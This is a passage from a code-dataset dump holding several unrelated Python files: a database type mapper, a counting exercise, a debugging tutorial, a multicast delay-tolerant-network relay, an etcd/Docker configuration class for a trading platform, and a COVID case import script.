pass;","sub_path":"PycharmProjects/DataAnalysis/study/o_enum.py","file_name":"o_enum.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"458403360","text":"import decimal\nimport datetime\n\n\ndef exasol_mapper(val, data_type):\n \"\"\"\n Convert into Python 3 data types according to Exasol manual\n\n strptime() function is slow, so we use direct string slicing for performance sake\n More details about this problem: http://ze.phyr.us/faster-strptime/\n\n DECIMAL(p,0) -> int\n DECIMAL(p,s) -> decimal.Decimal\n DOUBLE -> float\n DATE -> datetime.date\n TIMESTAMP -> datetime.datetime\n BOOLEAN -> bool\n VARCHAR -> str\n CHAR -> str\n 
<everything else> -> str\n \"\"\"\n\n if val is None:\n return None\n elif data_type['type'] == 'DECIMAL':\n if data_type['scale'] == 0:\n return int(val)\n else:\n return decimal.Decimal(val)\n elif data_type['type'] == 'DATE':\n return datetime.date(int(val[0:4]), int(val[5:7]), int(val[8:10]))\n elif data_type['type'] == 'TIMESTAMP':\n return datetime.datetime(int(val[0:4]), int(val[5:7]), int(val[8:10]), # year, month, day\n int(val[11:13]), int(val[14:16]), int(val[17:19]), # hour, minute, second\n int(val[20:26].ljust(6, '0')) if len(val) > 20 else 0) # microseconds (if available)\n else:\n return val\n","sub_path":"pyexasol/mapper.py","file_name":"mapper.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"195050652","text":"def number(n):\n dp = [[0] * 10 for i in range(n)]\n dp[0][0] = 0\n for i in range(1, 10):\n dp[0][i] = 1\n for i in range(1, n):\n dp[i][0] = dp[i - 1][0] + dp[i - 1][1]\n for j in range(1, 9):\n dp[i][j] = dp[i - 1][j - 1] + dp[i - 1][j] + dp[i - 1][j + 1]\n dp[i][9] = dp[i - 1][8] + dp[i - 1][9]\n return sum(dp[n - 1])\n\n\nnumbers_in = open('numbers.in', 'r')\nnumbers_out = open('numbers.out', 'w')\n\nn = int(numbers_in.readline())\nnumbers_in.close()\n\nprint(number(n), file=numbers_out)\nnumbers_out.close()\n","sub_path":"lKSH/day10/numbers.py","file_name":"numbers.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"179164803","text":"# Exceptions (exceptions are for user errors)\n# --------------------------------------------------------\ndef boxPrint(symbol, width, height):\n # Raising different exceptions to stop the program in case the parameters are wrong\n if len(symbol) != 1:\n raise Exception('Symbol must be a single character string.')\n if width <= 2:\n raise Exception('Width must be greater than 2.')\n if height <= 2:\n raise Exception('Height must be greater than 2.')\n print(symbol * width)\n for i in range(height - 2):\n print(symbol + (' ' * (width - 2)) + symbol)\n print(symbol * width)\n\nboxPrint('*', 5, 5)\n\n# Assertions (assertions are for programmer errors)\n# --------------------------------------------------------\nmarket_2nd = {'ns': 'green', 'ew': 'yellow'}\n\ndef switchLights(intersection):\n for key in intersection.keys():\n if intersection[key] == 'green':\n intersection[key] = 'yellow'\n elif intersection[key] == 'yellow':\n intersection[key] = 'red'\n elif intersection[key] == 'red':\n intersection[key] = 'green'\n # There must always be at least one red light in some direction\n assert 'red' in intersection.values(), 'Neither light is red' # if the assert fails the program crashes\n\nprint(market_2nd)\nswitchLights(market_2nd)\nprint(market_2nd)\n\n# Printing a Traceback\n# --------------------------------------------------------\nimport traceback\ntry:\n raise Exception('This is the error message')\nexcept: # we can write the traceback to a file\n error_File = open('error_log.txt', 'a')\n error_File.write(traceback.format_exc())\n error_File.close()\n print('The traceback info was written in error_log.txt')\n\n# Logging\n# --------------------------------------------------------\nimport logging\n\nlogging.basicConfig(filename = 'program_log.txt', level=logging.DEBUG, format=' %(asctime)s - %(levelname)s - %(message)s')\n# logging.disable(logging.CRITICAL) # uncomment to disable all logging messages\n\nlogging.debug('Start of program')\n\ndef factorial(n):\n 
logging.debug('Start of factorial(%s)' % (n))\n total = 1\n for i in range(1,n + 1):\n total *= i\n logging.debug('i is ' + str(i) + ', total is ' + str(total))\n logging.debug('End of factorial(%s)' % (n))\n return total\n\nprint(factorial(5))\nlogging.debug('End of program')","sub_path":"12_debugging.py","file_name":"12_debugging.py","file_ext":"py","file_size_in_byte":2343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"49893882","text":"# -*- coding: utf-8 -*-\nimport socket\nimport struct\nimport sys\nimport pickle\nimport json\nimport ast\nimport time\nimport os\nfrom geopy.distance import geodesic\n\nfrom pip._vendor.distlib.compat import raw_input\n\nlat_to = -7.265441\nlong_to = 112.797661\n\n\nport = 12346\nnodeid='s1'\npesanDikirim = []\n\ndef getDistance(lat_from,long_from):\n coords_1 = (lat_from, long_from)\n coords_2 = (lat_to, long_to)\n return geodesic(coords_1, coords_2).km\n\ndef compareDistance(distance,distance_limit):\n if distance < distance_limit:\n return 1\n else:\n return 0\n\ndef multicast():\n multicast_group = '224.3.29.71'\n server_address = ('', port)\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n sock.bind(server_address)\n group = socket.inet_aton(multicast_group)\n mreq = struct.pack('4sL', group, socket.INADDR_ANY)\n sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)\n data, address = sock.recvfrom(1024)\n data = json.loads(data.decode('utf8'))\n pesan = data[0]\n destination = data[1]\n hop = data[2] + 1\n while True:\n if (hop > data[7]):\n print('Hop count: ' + str(hop))\n print('Hop count limit reached')\n break\n elif (data[1] == nodeid):\n print('Message : ' + pesan)\n print('Last DTN node in the route')\n print('Time elapsed: ' + str(data[4]))\n print('Hop count: ' + str(hop))\n sock.sendto(b'ack', address)\n break\n send = sendMsg(pesan, destination, hop, data[3], data[4], data[5], data[6], data[7], data[8], data[9])\n if send == 1:\n break\n\ndef sendMsg(message,dest,hop,timestamp, source, lat_from,long_from,hop_limit,time_limit, distance_limit):\n settime = timestamp\n timecek = 0\n pesanDikirim = [message, dest, hop, time.time(), source, lat_from, long_from, hop_limit, time_limit,distance_limit]\n print('Sending message to nodeid ' + str(dest))\n hasil = send(pesanDikirim, port)\n while (timecek < time_limit):\n if hasil == 0:\n hasil = send(pesanDikirim, port)\n else:\n print('Message sent to nodeid ' + str(dest))\n break\n timecek = time.time() - settime\n if hasil == 0:\n print('Message lifetime limit reached, message will be deleted\\n')\n return 1\n\ndef send(message,port):\n multicast_group = ('224.3.29.71', port)\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n sock.settimeout(0.2)\n ttl = struct.pack('b', 1)\n sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, ttl)\n sock.sendto(json.dumps(message).encode('utf8'), multicast_group)\n while True:\n try:\n sock.recvfrom(16)\n except:\n sock.close()\n return 0\n else:\n print ('Message has been sent')\n sock.close()\n return 1\n\nif __name__ == '__main__':\n print(\"[Node ID \" + str(nodeid) + \"]\")\n print(\"--------------------\")\n print(\"1. Receive and deliver message to next node\")\n print(\"2. 
Exit\")\n while 1:\n print(\"\\nYour choice?\")\n pilihan = raw_input('>> ')\n if (pilihan == '1'):\n multicast()\n elif (pilihan == '2'):\n exit()","sub_path":"Delay Tolerant Network/receiver1/receive.py","file_name":"receive.py","file_ext":"py","file_size_in_byte":3762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"177178656","text":"import sys\nimport time\nimport json\n\nimport etcd\n\nfrom docker.types import RestartPolicy\nfrom docker.types.services import RestartConditionTypesEnum\n\n\nclass EtcdConfigMixin(object):\n\n BACKTEST = \"backtest\"\n REALTRADE = \"realtrade\"\n SIMULATION = \"simulation\"\n CBACKTEST = \"cbacktest\"\n\n # configs\n INDEX_SERVER_URIS = \"139.159.135.96:9802\"\n JZDATAURI = \"192.168.100.78:27017\"\n STRATEGY_MONGO = ''\n INDEX_SWITCH_SERVER = False\n\n # envs\n DOCKER_QUANT_IMAGE = 'cdh1:5000/jzquant:latest'\n DOCKER_V_BIND = '/data/strategy_data'\n DOCKER_NETWORK = ''\n STRATEGY_SENTRY_DSN = \"https://key1:key2@sentry.jingzhuan.cn/x\"\n MQ_HOST = \"127.0.0.1\"\n MQ_PORT = 5672\n STRATEGY_WRITE_EX = \"strategy\"\n STRATEGY_READ_EX = \"task_cmd\"\n MQ_VHOST = \"quant\"\n MQ_USERNAME = \"guest\"\n MQ_PASSWORD = \"guest\"\n\n QUANTUSER_SERVER_URL = \"http://139.159.148.58/u\"\n QUANTUSER_APP_ID = \"back\"\n QUANTUSER_TOKEN = ''\n QUANTUSER_REDIS_URI = ''\n DOCKER_QUANT_TRADE_IMAGE = ''\n TRADE_HOST = \"ff46fd5a21bf4fc4b3777e3ab4a96273\"\n TRADE_PORT = 9980\n MYSQL_URI = \"mysql+cymysql://root:ruiyang@127.0.0.1/trading?charset=utf8\"\n\n FUTURE_QUOTE_HOST = \"127.0.0.1\"\n FUTURE_QUOTE_PORT = 24444\n FUTURE_TRADE_HOST = \"127.0.0.1\"\n FUTURE_TRADE_PORT = 9980\n\n MOUNTS = [\"/etc/localtime:/etc/localtime:ro\"]\n\n log_driver = 'json-file'\n log_driver_options = {\"max-size\": \"10m\"}\n restart_policy = RestartPolicy(RestartConditionTypesEnum.NONE)\n source_code = \"\"\"\ndef init(context):\n logger.info('向导式策略启动')\ndef handle_bar(context, bar_dict):\n pass\n \"\"\"\n\n backtest_dir = \"/service/config/backtest/\"\n simulation_dir = \"/service/config/simulation/\"\n realtrade_dir = \"/service/config/realtrade/\"\n backtest_environment_dir = \"/service/environment/backtest/\"\n simulation_environment_dir = \"/service/environment/simulation/\"\n realtrade_environment_dir = \"/service/environment/realtrade/\"\n\n\n @property\n def etcd(self):\n return etcd.Client(host='127.0.0.1', port=2379)\n\n def set_realtrade_args(self):\n realtrade = dict()\n\n config_atr = ('run_type', 'mod_config'\n 'start_date', 'end_date', 'stock_starting_cash', 'frequency', 'benchmark',\n 'user_id', 'user_account', 'strategy_id', 'strategy_name', 'code_type',\n 'index_server_uris', 'index_switch_server',\n 'source_code',\n 'log_level', 'task_id'\n )\n\n mod_atr = ('messaging__enabled', 'mongodb__enabled', 'exception__enabled', 'mongodb__mongouri',\n 'guide_buy_sell__enabled', 'guide_buy_sell__kwarg',\n 'guide_stockpool__enabled', 'guide_stockpool__kwarg', 'realtime__fps',\n\n 'sys_simulation__enabled', 'sys_progress__enabled', 'sys_analyser__enabled',\n 'messaging__rw', 'realtrade__enabled', 'sys_risk__enabled', 'mongodb__enabled',\n 'mongodb__mongouri', 'terminator__enabled')\n\n for atr in config_atr:\n realtrade.update({atr: \"\"})\n\n mod_config = dict()\n for atr in mod_atr:\n mod_config.update({atr: ''})\n\n mod_config.update({'messaging__enabled': \"true\"})\n\n mod_config.update({'guide_buy_sell__enabled': 'true'})\n mod_config.update({'guide_stockpool__enabled': 'true'})\n\n mod_config.update({'realtime__fps': 
'true'})\n\n mod_config.update({'sys_simulation__enabled': 'false'})\n mod_config.update({'sys_progress__enabled': 'false'})\n mod_config.update({'sys_analyser__enabled': 'false'})\n mod_config.update({'messaging__rw': '3'})\n mod_config.update({'realtrade__enabled': 'true'})\n mod_config.update({'sys_risk__enabled': 'true'})\n mod_config.update({'mongodb__enabled': 'true'})\n mod_config.update({'mongodb__mongouri': self.JZDATAURI})\n mod_config.update({'terminator__enabled': 'true'})\n\n realtrade.update({'run_type': \"r\"})\n realtrade.update({'source_code': self.source_code})\n realtrade.update({'index_server_uris': self.INDEX_SERVER_URIS})\n realtrade.update({'index_switch_server': self.INDEX_SWITCH_SERVER})\n realtrade.update({'log_level': \"verbose\"})\n\n realtrade.update({'mod_config': mod_config})\n\n self.etcd.set(self.realtrade_dir, json.dumps(realtrade))\n\n def set_simulation_args(self):\n simulation = dict()\n config_atr = ('run_type', 'mod_config',\n 'start_date', 'end_date', 'stock_starting_cash', 'frequency', 'benchmark',\n 'user_id', 'user_account', 'strategy_id', 'strategy_name', 'code_type',\n 'index_server_uris', 'index_switch_server',\n 'source_code',\n 'log_level', 'task_id'\n\n )\n\n mod_atr = ('messaging__enabled', 'mongodb__enabled', 'exception__enabled', 'mongodb__mongouri',\n 'guide_buy_sell__enabled', 'guide_buy_sell__kwarg',\n 'guide_stockpool__enabled', 'guide_stockpool__kwarg', 'realtime__fps',\n\n 'sys_simulation__matching_type', 'sys_simulation__slippage',\n 'sys_simulation__commission_multiplier',\n 'realtime__enabled', 'realtime__simulation_id', 'messaging__rw')\n\n for atr in config_atr:\n simulation.update({atr: ''})\n\n mod_config = dict()\n for atr in mod_atr:\n mod_config.update({atr: ''})\n\n mod_config.update({'messaging__enabled': \"true\"})\n mod_config.update({'mongodb__enabled': \"true\"})\n mod_config.update({'exception__enabled': \"true\"})\n mod_config.update({'mongodb__mongouri': self.JZDATAURI})\n mod_config.update({'guide_buy_sell__enabled': 'true'})\n mod_config.update({'guide_stockpool__enabled': 'true'})\n mod_config.update({'realtime__enabled': 'true'})\n mod_config.update({'messaging__rw': \"3\"})\n\n simulation.update({'mod_config': mod_config})\n\n simulation.update({'run_type': \"p\"})\n simulation.update({'source_code': self.source_code})\n simulation.update({'index_server_uris': self.INDEX_SERVER_URIS})\n simulation.update({'index_switch_server': self.INDEX_SWITCH_SERVER})\n simulation.update({'log_level': \"verbose\"})\n\n self.etcd.set(self.simulation_dir, json.dumps(simulation))\n\n def set_backtest_args(self):\n backtest = dict()\n config_atr = ('run_type', 'mod_config',\n 'start_date', 'end_date', 'stock_starting_cash', 'frequency', 'benchmark',\n 'user_id', 'user_account', 'strategy_id', 'strategy_name', 'code_type',\n 'log_level', 'task_id', 'run_type',\n # 'index_server', 'index_port',\n 'index_server_uris', 'index_switch_server',\n 'source_code',\n 'log_level', 'task_id',)\n\n mod_atr = ('messaging__enabled', 'mongodb__enabled', 'exception__enabled','mongodb__mongouri',\n 'guide_buy_sell__enabled', 'guide_buy_sell__kwarg',\n 'guide_stockpool__enabled', 'guide_stockpool__kwarg',\n\n 'sys_simulation__matching_type', 'sys_simulation__slippage',\n 'sys_simulation__commission_multiplier', 'sys_simulation__stock_min_commision',\n 'trade_message__enabled', 'trade_message__debug', 'storeDB__enabled',\n 'storeDB__host', 'messaging__rw')\n\n for atr in config_atr:\n backtest.update({atr: ''})\n\n mod_config = dict()\n for atr in 
mod_atr:\n mod_config.update({atr: ''})\n\n mod_config.update({'messaging__enabled': \"true\"})\n mod_config.update({'mongodb__enabled': \"true\"})\n mod_config.update({'exception__enabled': \"true\"})\n mod_config.update({'mongodb__mongouri': self.JZDATAURI})\n mod_config.update({'guide_buy_sell__enabled': 'true'})\n mod_config.update({'guide_stockpool__enabled': 'true'})\n mod_config.update({'trade_message__enabled': 'true'})\n mod_config.update({'trade_message__debug': 'true'})\n mod_config.update({'storeDB__enabled': 'true'})\n mod_config.update({'storeDB__host': self.STRATEGY_MONGO})\n mod_config.update({'messaging__rw': \"1\"})\n\n backtest.update({'mod_config': mod_config})\n backtest.update({'run_type': \"b\"})\n backtest.update({'source_code': self.source_code})\n backtest.update({'index_server_uris': self.INDEX_SERVER_URIS})\n backtest.update({'index_switch_server': self.INDEX_SWITCH_SERVER})\n\n self.etcd.set(self.backtest_dir, json.dumps(backtest))\n\n def set_backtest_environment(self):\n environment = dict()\n\n image = self.DOCKER_QUANT_IMAGE\n\n labels = {'type': self.BACKTEST, \"user\": \"\"}\n\n mounts = self.MOUNTS\n\n # volume = self.DOCKER_V_BIND\n\n jzdatarui = self.JZDATAURI\n strategy_sentry = self.STRATEGY_SENTRY_DSN\n mqhost = self.MQ_HOST\n mqport = self.MQ_PORT\n write_ex = self.STRATEGY_WRITE_EX\n read_ex = self.STRATEGY_READ_EX\n mq_vhost = self.MQ_VHOST\n mq_username = self.MQ_USERNAME\n mq_password = self.MQ_PASSWORD\n\n envs = [\n \"JZDATAURI={}\".format(jzdatarui),\n f\"SENTRY_DSN={strategy_sentry}\",\n f\"MQ_HOST={mqhost}\",\n f\"MQ_PORT={mqport}\",\n f\"STRATEGY_WRITE_EX={write_ex}\",\n f\"STRATEGY_READ_EX={read_ex}\",\n f\"MQ_VHOST={mq_vhost}\",\n f\"MQ_USERNAME={mq_username}\",\n f\"MQ_PASSWORD={mq_password}\",\n ]\n\n log_driver = self.log_driver\n\n log_driver_options = self.log_driver_options\n\n restart_policy = self.restart_policy\n\n networks = self.DOCKER_NETWORK\n networks = networks.split(',')\n\n environment.update({\n \"image\": image,\n \"labels\": labels,\n \"mounts\": mounts,\n \"envs\": envs,\n \"log_driver\": log_driver,\n \"log_driver_options\": log_driver_options,\n \"restart_policy\": restart_policy,\n \"networks\": networks\n })\n\n self.etcd.set(self.backtest_environment_dir, json.dumps(environment))\n\n def set_simulation_environment(self):\n environment = self.backtest_environment\n labels = environment.get(\"labels\")\n labels.update({'type': self.SIMULATION})\n environment.update({\"labels\": labels})\n self.etcd.set(self.simulation_environment_dir, json.dumps(environment))\n\n def set_realtrade_environmet(self):\n environment = dict()\n\n # volume = self.DOCKER_V_BIND\n image = self.DOCKER_QUANT_TRADE_IMAGE\n\n labels={'type': self.REALTRADE, \"user\": ''}\n\n mounts = self.MOUNTS\n\n jzdatarui = self.JZDATAURI\n mysql_uri = self.MYSQL_URI\n quantuser_url = self.QUANTUSER_SERVER_URL\n quantuser_app_id = self.QUANTUSER_APP_ID\n quantuser_token = self.QUANTUSER_TOKEN\n quantuser_redis_uri = self.QUANTUSER_REDIS_URI\n trade_host = self.TRADE_HOST\n trade_port = self.TRADE_PORT\n strategy_sentry = self.STRATEGY_SENTRY_DSN\n mqhost = self.MQ_HOST\n mqport = self.MQ_PORT\n write_ex = self.STRATEGY_WRITE_EX\n read_ex = self.STRATEGY_READ_EX\n mq_vhost = self.MQ_VHOST\n mq_username = self.MQ_USERNAME\n mq_password = self.MQ_PASSWORD\n future_quote_host = self.FUTURE_QUOTE_HOST\n future_quote_port = self.FUTURE_QUOTE_PORT\n future_trade_host = self.FUTURE_TRADE_HOST\n future_trade_port = self.FUTURE_TRADE_PORT\n\n envs = [\n 
\"JZDATAURI={}\".format(jzdatarui),\n 'MYSQL_URI={}'.format(mysql_uri),\n \"QUANTUSER_URL={}\".format(quantuser_url),\n \"QUANTUSER_APP_ID={}\".format(quantuser_app_id),\n \"QUANTUSER_TOKEN={}\".format(quantuser_token),\n \"QUANTUSER_REDIS_URI={}\".format(quantuser_redis_uri),\n \"TRADE_HOST={}\".format(trade_host),\n \"TRADE_PORT={}\".format(trade_port),\n f\"SENTRY_DSN={strategy_sentry}\",\n f\"MQ_HOST={mqhost}\",\n f\"MQ_PORT={mqport}\",\n f\"STRATEGY_WRITE_EX={write_ex}\",\n f\"STRATEGY_READ_EX={read_ex}\",\n f\"MQ_VHOST={mq_vhost}\",\n f\"MQ_USERNAME={mq_username}\",\n f\"MQ_PASSWORD={mq_password}\",\n f\"FUTURE_QUOTE_HOST={future_quote_host}\",\n f\"FUTURE_QUOTE_PORT={future_quote_port}\",\n f\"FUTURE_TRADE_HOST={future_trade_host}\",\n f\"FUTURE_TRADE_PORT={future_trade_port}\",\n ]\n\n log_driver = self.log_driver\n\n log_driver_options = self.log_driver_options\n\n networks = self.DOCKER_NETWORK\n networks = networks.split(',')\n\n environment.update({\n \"image\": image,\n \"labels\": labels,\n \"mounts\": mounts,\n \"envs\": envs,\n \"log_driver\": log_driver,\n \"log_driver_options\": log_driver_options,\n \"networks\": networks\n })\n\n self.etcd.set(self.realtrade_environment_dir, json.dumps(environment))\n\n @property\n def simulation_args(self):\n return json.loads(self.etcd.read(self.simulation_dir).value)\n\n @property\n def backtest_args(self):\n return json.loads(self.etcd.read(self.backtest_dir).value)\n\n @property\n def realtrade_args(self):\n return json.loads(self.etcd.read(self.realtrade_dir).value)\n\n @property\n def backtest_environment(self):\n return json.loads(self.etcd.read(self.backtest_environment_dir).value)\n\n @property\n def simulation_environment(self):\n return json.loads(self.etcd.read(self.simulation_environment_dir).value)\n\n @property\n def realtrade_environment(self):\n return json.loads(self.etcd.read(self.realtrade_environment_dir).value)\n\n\nclass BaseConfigMixin(EtcdConfigMixin):\n def base_update(self):\n pass\n\n def realtrade_commond(self):\n configs = self.realtrade_args\n mod_config = configs.get(\"mod_config\", {})\n\n configs.update({\n \"start_date\": self.start_date,\n \"end_date\": self.end_date,\n \"stock_starting_cash\": self.stock_starting_cash,\n \"frequency\": self.frequency,\n \"benchmark\": self.benchmark,\n \"user_id\": self.user_id,\n \"user_account\": self.user_account,\n \"strategy_id\": self.id,\n \"strategy_name\": self.name,\n \"code_type\": self.type,\n\n \"task_id\": self.id,\n\n })\n\n uris = configs.get(\"index_server_uris\").split(\",\")\n server_list = []\n for group in uris:\n server = group.split(\":\")\n server_list.append((server[0].strip(), server[1].strip()))\n if configs.get(\"index_switch_server\"):\n seed = int(time.time())\n selected = server_list[seed % len(server_list)]\n else:\n selected = server_list[0]\n configs.pop(\"index_server_uris\")\n configs.pop(\"index_switch_server\")\n\n configs.update({\n \"index_server\": selected[0],\n \"index_port\": str(selected[1])\n })\n\n mod_config.pop('mongodb__enabled')\n mod_config.pop('exception__enabled')\n mod_config.pop('mongodb__mongouri')\n\n if self.type == \"向导式\":\n guide = self.guide\n stock_pool = guide.pop('stock', {})\n # hedge = guide.pop('hedge', {})\n mod_config.update({\n \"guide_buy_sell__kwarg\": json.dumps(guide),\n \"guide_stockpool__kwarg\": json.dumps(stock_pool)\n })\n elif self.type == \"编码式\":\n configs.update({\n \"source_code\": self.strategy_code,\n })\n mod_config.pop(\"guide_buy_sell__kwarg\")\n 
mod_config.pop(\"guide_stockpool__kwarg\")\n #\n mod_config.pop(\"realtime__fps\")\n\n configs.update({\"mod_config\": mod_config})\n return self.commond(configs)\n\n def simulation_commond(self):\n configs = self.simulation_args\n mod_config = configs.get(\"mod_config\", {})\n\n configs.update({\n \"start_date\": self.start_date,\n \"end_date\": self.end_date,\n \"stock_starting_cash\": self.stock_starting_cash,\n \"frequency\": self.frequency,\n \"benchmark\": self.benchmark,\n \"user_id\": self.user_id,\n \"user_account\": self.user_account,\n \"strategy_id\": self.id,\n \"strategy_name\": self.name,\n \"code_type\": self.type,\n\n \"task_id\": self.id #\n\n })\n\n mod_config.update({\n \"sys_simulation__matching_type\": self.matching_type,\n \"sys_simulation__slippage\": str(self.slippage),\n \"sys_simulation__commission_multiplier\": str(self.commission_multiplier),\n \"realtime__simulation_id\": str(self.simulation_id), #\n })\n\n uris = configs.get(\"index_server_uris\").split(\",\")\n server_list = []\n for group in uris:\n server = group.split(\":\")\n server_list.append((server[0].strip(), server[1].strip()))\n if configs.get(\"index_switch_server\"):\n seed = int(time.time())\n selected = server_list[seed % len(server_list)]\n else:\n selected = server_list[0]\n configs.pop(\"index_server_uris\")\n configs.pop(\"index_switch_server\")\n\n configs.update({\n \"index_server\": selected[0],\n \"index_port\": str(selected[1])\n })\n\n if self.type == \"向导式\":\n guide = self.guide\n stock_pool = guide.pop('stock', {})\n # hedge = guide.pop('hedge', {})\n mod_config.update({\n \"guide_buy_sell__kwarg\": json.dumps(guide),\n \"guide_stockpool__kwarg\": json.dumps(stock_pool)\n })\n elif self.type == \"编码式\":\n configs.update({\n \"source_code\": self.strategy_code,\n })\n mod_config.pop(\"guide_buy_sell__kwarg\")\n mod_config.pop(\"guide_stockpool__kwarg\")\n #\n mod_config.pop(\"realtime__fps\")\n\n configs.update({\"mod_config\": mod_config})\n return self.commond(configs)\n\n def backtest_commond(self, task_id, debug):\n configs = self.backtest_args\n mod_config = configs.get(\"mod_config\", {})\n\n configs.update({\n \"start_date\": self.start_date,\n \"end_date\": self.end_date,\n \"stock_starting_cash\": self.stock_starting_cash,\n \"frequency\": self.frequency,\n \"benchmark\": self.benchmark,\n \"user_id\": self.user_id,\n \"user_account\": self.user_account,\n \"strategy_id\": self.id,\n \"strategy_name\": self.name,\n \"code_type\": self.type,\n \"log_level\": self.log_level,\n\n \"task_id\": task_id,\n\n })\n\n mod_config.update({\n \"sys_simulation__matching_type\": self.matching_type,\n \"sys_simulation__slippage\": str(self.slippage),\n \"sys_simulation__commission_multiplier\": str(self.commission_multiplier),\n \"sys_simulation__stock_min_commision\": str(self.stock_min_commision)\n })\n\n uris = configs.get(\"index_server_uris\").split(\",\")\n print(uris)\n # sys.exit(0)\n server_list = []\n for group in uris:\n server = group.split(\":\")\n server_list.append((server[0].strip(), server[1].strip()))\n if configs.get(\"index_switch_server\"):\n seed = int(time.time())\n selected = server_list[seed % len(server_list)]\n else:\n selected = server_list[0]\n configs.pop(\"index_server_uris\")\n configs.pop(\"index_switch_server\")\n\n configs.update({\n \"index_server\": selected[0],\n \"index_port\": str(selected[1])\n })\n\n if self.type == \"向导式\":\n guide = self.guide\n stock_pool = guide.pop('stock', {})\n # hedge = guide.pop('hedge', {})\n mod_config.update({\n 
\"guide_buy_sell__kwarg\": json.dumps(guide),\n \"guide_stockpool__kwarg\": json.dumps(stock_pool)\n })\n elif self.type == \"编码式\":\n configs.update({\n \"source_code\": self.strategy_code,\n })\n mod_config.pop(\"guide_buy_sell__kwarg\")\n mod_config.pop(\"guide_stockpool__kwarg\")\n\n configs.update({\"mod_config\": mod_config})\n\n return self.commond(configs)\n\n def commond(self, configs):\n commond = []\n for key, value in configs.items():\n if key == \"mod_config\":\n continue\n commond.append('--' + key.replace('_', '-'))\n commond.append(value)\n\n for key, value in configs.get(\"mod_config\", {}).items():\n commond.extend(['--mod-config', key, value])\n return commond\n\n\nif __name__ == \"__main__\":\n class Strategy(BaseConfigMixin):\n def __init__(self, **kwargs):\n self.__dict__ = kwargs\n\n args = {\n \"name\": '符瑞阳的策略001',\n \"type\": \"向导式\",\n \"strategy_code\": \"abcdefg\",\n \"start_date\": \"2016-01-01\",\n \"end_date\": \"2017-09-01\",\n \"stock_starting_cash\": 100000,\n \"frequency\": \"1d\",\n \"benchmark\": '000001.XSHG',\n \"matching_type\": \"current_bar\",\n \"slippage\": 0,\n \"commission_multiplier\": 1,\n \"stock_min_commision\": 5,\n \"log_level\": \"info\",\n \"guide\": {}\n\n }\n strategy = Strategy(**args)\n\n user_uid = \"1\" # request.user.uid\n user_username = \"ruiyang\" # request.user.username\n timestamp = time.time()\n strategy.__dict__.update({\n 'modified_time': timestamp,\n 'create_time': timestamp,\n 'user_id': user_uid,\n 'user_account': user_username,\n 'task_names': []\n })\n\n import bson\n id = str(bson.ObjectId())\n\n strategy.__dict__.update({\n \"id\": id,\n })\n\n task = str(bson.ObjectId())\n\n task_name = \"{}_{}_{}\".format('b', user_uid, task)\n\n debug = True #\n\n strategy.set_backtest_args()\n try:\n strategy.backtest_commond(task, debug)\n except Exception as e:\n print(e)\n\n # j = BaseConfigMixin()\n # j.backtest_commond(None, None)\n # j.simulation_commond()\n\n # rundemo = EtcdConfigMixin()\n # rundemo.set_backtest_args()\n # print(rundemo.backtest_args)\n # rundemo.set_simulation_args()\n # print(rundemo.simulation_args)\n # rundemo.set_realtrade_args()\n # print(rundemo.realtrade_args)\n # rundemo.set_backtest_environment()\n # print(rundemo.backtest_environment)\n # rundemo.set_simulation_environment()\n # print(rundemo.simulation_environment)\n # rundemo.set_realtrade_environmet()\n # print(rundemo.realtrade_environment)\n\n","sub_path":"try_002.py","file_name":"try_002.py","file_ext":"py","file_size_in_byte":23136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"294313729","text":"import wget\nimport pymongo\nfrom dotenv import load_dotenv\n\nfrom pprint import pprint\nimport os\nimport csv\nfrom datetime import datetime\n\n\nDATA_URL = 'https://data.ontario.ca/dataset/f4112442-bdc8-45d2-be3c-12efae72fb27/resource/455fd63b-603d-4608-8216-7d8647f43350/download/conposcovidloc.csv'\n\ndef download_data(url):\n filename = 'data/raw/ontario/ontario_cases_{}.csv'.format(datetime.now())\n return wget.download(url, filename)\n\n\ndef read_csv(filename):\n cases = []\n with open(filename) as csv_file:\n reader = csv.reader(csv_file)\n column_names = next(reader)\n for row in reader:\n tmp = {\n '_id': row[0],\n 'episode_date': datetime.strptime(row[1], '%Y-%m-%d'),\n }\n\n for index, column in enumerate(row):\n field_name = column_names[index].lower()\n if 'latitude' in field_name or 'longitude' in field_name:\n tmp[field_name] = float(column)\n else:\n tmp[field_name] = 
column\n\n cases.append(tmp)\n\n return cases\n\n\ndef sync_with_db(cases, mongo_uri):\n client = pymongo.MongoClient(mongo_uri)\n db = client.get_default_database()\n db.ontario_cases.drop()\n db.ontario_cases.insert_many(cases)\n\n\nif __name__ == '__main__':\n load_dotenv()\n mongo_uri = os.getenv('MONGO_URI', 'mongodb://localhost.com:27071')\n\n filename = download_data(DATA_URL)\n cases = read_csv(filename)\n sync_with_db(cases, mongo_uri)\n","sub_path":"src/sync_ontario_cases.py","file_name":"sync_ontario_cases.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"451698899","text":"#!/usr/bin/env python3\n# -*- coding: utf-8; -*-\nimport mysql.connector\nimport common.logger as logger\nimport common.config_module as config_module\nfrom common.check_verify import is_equal\n\n\nclass CheDb(object):\n def __init__(self, db_config=None, verbose=False):\n db_config = db_config or config_module.load()[\"database\"]\n self.host = db_config[\"host\"]\n self.port = db_config[\"port\"]\n self.database = db_config[\"database\"]\n self.username = db_config[\"username\"]\n self.password = db_config[\"password\"]\n self.connection = self.open_validate_mysql_connection(verbose=verbose)\n\n def open_validate_mysql_connection(self, verbose=False):\n try:\n conn = mysql.connector.connect(host=self.host, port=self.port, 